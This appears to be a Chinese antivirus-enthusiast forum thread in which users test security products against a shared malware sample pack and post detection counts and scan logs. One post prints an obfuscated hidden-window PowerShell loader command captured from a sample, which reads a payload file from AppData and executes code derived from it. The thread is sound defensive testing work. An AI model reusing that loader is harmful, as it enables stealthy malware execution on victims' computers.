【开放测试】卡饭病毒样本包 20240910 第161期

显示全部楼层 · 发表于 2024-9-10 15:06:26

本帖最后由 GreatMOLA 于 2024-9-10 15:27 编辑

Symantec 静态 3x

执行

1460531MES_S Quote.exe - SONAR 杀

halveringer jordnr.exe - IPS 阻断

"powershell.exe" -windowstyle hidden "$has=Get-Content 'C:\Users\User1211\AppData\Roaming\Palaeodictyopteron\testudskrivningsfaciliteters\Marinerede\Berrings.Non195';$Nuanced=$has.SubString(56164,3);.$Nuanced($has)"

复制代码

Obsidian_Installer_v.3.15.msi - 机学杀

显示全部楼层 · 发表于 2024-9-10 15:13:05

本帖最后由 King、暮光于 2024-9-10 15:58 编辑

虚拟机网络有点问题，连不上云。天穹断网未连接云库情况下右键miss all。双击kill 1x

显示全部楼层 · 发表于 2024-9-10 15:22:05

本帖最后由 ninjagaocc 于 2024-9-10 15:55 编辑

HiSec Endpoint华为乾坤
解压缩后删1x,剩余5x
关闭防护后右键扫描，删1x,剩余5x
双击剩余5x，除了Obsidian_Installer_v.3.15，其他都可以拦截
安装完Obsidian_Installer_v.3.15后显示Error，其余的4x也自动消失了

【1】 2024-09-10 15:30:33，自定义扫描，发现风险0个风险项目

病毒库版本：2024091001
杀毒引擎版本：11.Release_2024073000
开始时间：2024-09-10 15:30:33
总计用时：00:00:00
任务状态：已完成
扫描文件：5
发现风险：0
已处理风险：0
病毒详情：

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【2】 2024-09-10 15:28:50，自定义扫描，发现风险1个风险项目

病毒库版本：2024091001
杀毒引擎版本：11.Release_2024073000
开始时间：2024-09-10 15:28:50
总计用时：00:00:00
任务状态：已完成
扫描文件：6
发现风险：1
已处理风险：1
病毒详情：
病毒名称：Win32.Trojan.Autoit，病毒文件名称：1460531MES_S Quote.exe，病毒文件路径：C:\Users\Administrator\Desktop\1\，病毒等级：中，病毒类型：木马病毒，病毒发现时间：2024-09-10 15:22:36，处置结果：处置成功，处置动作：隔离

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【3】 2024-09-10 15:23:33，自定义扫描，发现风险0个风险项目

病毒库版本：2024091001
杀毒引擎版本：11.Release_2024073000
开始时间：2024-09-10 15:23:33
总计用时：00:00:05
任务状态：已完成
扫描文件：5
发现风险：0
已处理风险：0
病毒详情：

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
统计结果

原始文件数量: 6

处理项目数量: 1

删除项目数量: 1

修复项目数量: 0

近似查杀率: 16.66 %

显示全部楼层 · 发表于 2024-9-10 15:22:48

本帖最后由 King、暮光于 2024-9-10 15:24 编辑

avast 右键kill 3x 沙盒运行kill 1x miss2x
其中 1460531这个样本是沙盒运行报毒。
值得一提的是，扫描miss的三个样本沙盒运行时，360企业安全云均有拦截提示（手动放行测试avast）

显示全部楼层 · 发表于 2024-9-10 15:36:06

提示: 该帖被管理员或版主屏蔽

显示全部楼层 · 发表于 2024-9-10 15:40:27

提示: 该帖被管理员或版主屏蔽

显示全部楼层 · 发表于 2024-9-10 15:50:33

Deep Instinct 静态 4x

执行

Obsidian_Installer_v.3.15.msi

Processo Trabalhista.vbs

显示全部楼层 · 发表于 2024-9-10 15:53:29

本帖最后由 11111111111445 于 2024-9-10 16:45 编辑

avast4分钟后二测扫描4x 双击kill all再来个智量扫描2x 双击1x miss3x

显示全部楼层 · 发表于 2024-9-10 16:07:34

King、暮光发表于 2024-9-10 15:13
虚拟机网络有点问题，连不上云。天穹断网未连接云库情况下右键miss all。双击kill 1x

更新成17.5的版本就好了，不然会莫名其妙断网的

显示全部楼层 · 发表于 2024-9-10 16:14:52

King、暮光发表于 2024-9-10 15:22
avast 右键kill 3x 沙盒运行kill 1x miss2x
其中 1460531这个样本是沙盒运行报毒。
值得一提的是，扫描m ...

现在avast双击已能kill all 云拉黑了

BBQ_Le 头像被屏蔽	发表于 2024-9-10 15:36:06 \| 显示全部楼层提示: 该帖被管理员或版主屏蔽
BBQ_Le 头像被屏蔽
	回复举报

yzsts 头像被屏蔽	发表于 2024-9-10 15:40:27 \| 显示全部楼层提示: 该帖被管理员或版主屏蔽
yzsts 头像被屏蔽
	回复举报

[病毒样本] 【开放测试】卡饭病毒样本包 20240910 第161期

本帖子中包含更多资源

评分

评分

本帖子中包含更多资源

评分

本帖子中包含更多资源

评分

本帖子中包含更多资源

评分

本帖子中包含更多资源

评分